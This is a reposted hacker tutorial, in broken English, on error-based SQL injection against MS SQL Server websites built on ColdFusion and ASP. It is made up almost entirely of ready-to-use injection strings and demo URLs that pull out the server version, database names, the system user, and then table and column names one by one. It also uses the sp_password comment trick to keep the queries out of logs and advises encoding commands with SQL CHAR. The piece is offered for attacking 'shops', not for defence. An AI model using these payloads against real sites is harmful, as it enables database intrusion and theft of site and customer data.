J2TEAM Security: A must-have extension for Chrome users. Install now!

Exctract Table and Columns name in MsSQL

###################################
Title: Exctract Table and Columns name in MsSQL ( .cfm & .asp )
-
Author: DaNZeL
-
WebSite: http://www.GoldHaxors.Com
-
Hotmail: danzel@flash-crew.com
-
Yahoo: FlashcRew@Yahoo.com
###################################
 
Hi allz ..

I want to tech you how to exctract Tables And Columns from MsSQL shop's ..

some people has ben a interes for that ..

and i write for you .



-

Get the Version:

and 1=convert(int,@@version)--sp_password-

Get Server Name :

and 1=convert(int,@@servername)--sp_password

Demo:

http://site.com/view.cfm?id=56 and 1=convert(int,@@servername)--sp_password

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'SERVER NAME HERE' to a column of data type int.



-

Get data base name:





and 1=convert(int,db_name())--sp_password
and 1=convert(int,db_name(1))--sp_password
and 1=convert(int,db_name(2))--sp_password
and 1=convert(int,db_name(3))--sp_password
and 1=convert(int,db_name(4))--sp_passwordetc ...





Demo:

http://site.com/view.cfm?id=56 and 1=convert(int,db_name())--sp_password
http://site.com/view.cfm?id=56 and 1=convert(int,db_name(2))--sp_password



[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'DB NAME HERE' to a column of data type int.





-

Get system user :

and 1=convert(int,system_user)--sp_password



http://site.com/view.cfm?id=56 and 1=convert(int,system_user)--sp_password

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'System User' to a column of data type int.





-



-

Get the first Table :

and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password

demo :

http://site.com/view.cfm?id=56 and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password

We get this error:

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'First TAble Here' to a column of data type int.



-



Get the second table:

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))--sp_password

example:

http://site.com/view.cfm|id=56 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))--sp_password



[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'Second Table is Here' to a column of data type int.





-

Get Next Table 

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('table1,'Table2')))--sp_password 





-



Get the 3 table :

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))--sp_password

http://site.com/view.cfm?id=56 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))--sp_password

[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value '3 Table' to a column of data type int.



And we get the 3 table .. for get more table go with step with last table ..





--



Now you need to get the columns in any table :



We goo with this process ..



Get first columns from table 1 :

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))--sp_password

http://site.com/view.cfm?id=56 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))--sp_password

and we get the first columns in this table



[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'Column Name here' to a column of data type int.



--



Get second column :

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("FIRST-COLUMNS-HERE")))--sp_password



http://site.com/view.cfm?id=56and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("FIRST-COLUMNS-HERE")))--sp_password

and we will get te second columns



[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'Second Column here' to a column of data type int.



--



Get 3 columns :

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("SECOND-COLUMNS-HERE")))--sp_password

http://site.com/view.cfm?id=56and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("SECOND-COLUMNS-HERE")))--sp_password

and we have column number 3



[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting 
the nvarchar value 'COLUMN-NR-3' to a column of data type int.





and in this method you use in next step ..



Don't Forget to change the commands in SQL Char

For any help Email me



Peace

Danzel / Flashcrew 
 
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!